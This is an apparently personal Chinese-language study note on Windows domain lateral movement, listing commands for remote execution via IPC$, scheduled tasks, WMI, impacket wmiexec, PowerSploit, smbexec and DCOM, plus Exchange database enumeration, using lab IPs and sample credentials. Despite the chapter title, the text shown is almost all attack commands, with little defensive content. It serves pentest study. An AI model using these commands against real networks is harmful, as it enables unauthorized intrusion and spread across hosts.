5.域内横向移动分析及防御.md

第五章 域内横向移动分析及防御

5.1 常用Windows远程连接和命令

IPC

net use \\192.168.1.10\ipc$ "admin123" /user:administrator

dir

dir \\192.168.1.10\c$

tasklist

tasklist /S 192.168.1.10 /U administrator /P admin123

at：是Windows server 2008之前的计划任务命令

at \\192.168.1.10 4:11PM C:\shell.bat

创建之后会有一个任务ID，指定任务ID可以删除

at \\192.168.1.10 7 /delete

schtasks

schtasks /create /s 192.168.1.10 /tn test /sc onstart /tr C:\calc.bat /ru system /f

介绍了几种抓取本地账户密码和SAM中HASH值的方法，直接跳过了，可以参考ATT&CK中的Credential Access一章

5.6 WMI

基本的执行方式：

wmic /node:192.168.1.10 /user:administrator /password:admin123 process call create "cmd.exe" /c ipconfig > ip.txt"

其他工具：

impacket中的wmiexec，成功连接之后会有一个交互式的命令行

wmiexec.py administrator:admin123@192.168.1.10

wmiexec.vbs

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.10 administrator admin123

cscript.exe wmiexec.vbs /cmd 192.168.1.10 administrator admin123 "ipconfig"

Invoke-WMICommand

Invoke-WMICommand是PowerSpolit中的脚本：

$user = "test\administrator"
$password = ConverTo-SecureString -String "admin123" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
$remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 192.168.1.10
$remote.PayloadOutput

Invoke-WMIMethod是powershell自带的

$user = "test\administrator"
$password = ConverTo-SecureString -String "admin123" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "ipconfig" -ComputerName "192.168.1.10" -Credential $Cred

5.8 SMBEXEC

Impacket中有这个插件

Linux版本下载地址：https://github.com/brav0hax/smbexec.git

安装命令：

git clone https://github.com/brav0hax/smbexec.git
chmod +x install.sh && ./install.sh

5.9 DCOM在远程系统中的使用

通过本地DCOM执行命令

获取DCOM程序列表：

Get-CimInstance Win32_DCOMApplication
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

使用DCOM在远程机器上执行命令

1调用MMC20.Application远程执行命令

net use \\192.168.1.10 "admin123" /user:test\xiaom
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.10"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c cmd.exe","")

2、调用9BA05972-F6A8-11CF-A442-00A0C90A8F39

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.1.10")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)关于这个方法的详细内容可以参考文章：https://bbs.pediy.com/thread-226540-1.htm

5.10 SPN在域环境中的应用

5.11 Exchange邮件服务器安全防范

查看邮件数据库

//查询之前需要安装命令
add-pssnapin microsoft.exchange *
Get-MailboxDatabase -server "Exchange1"
Get-MailboxDatabase -Identity 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath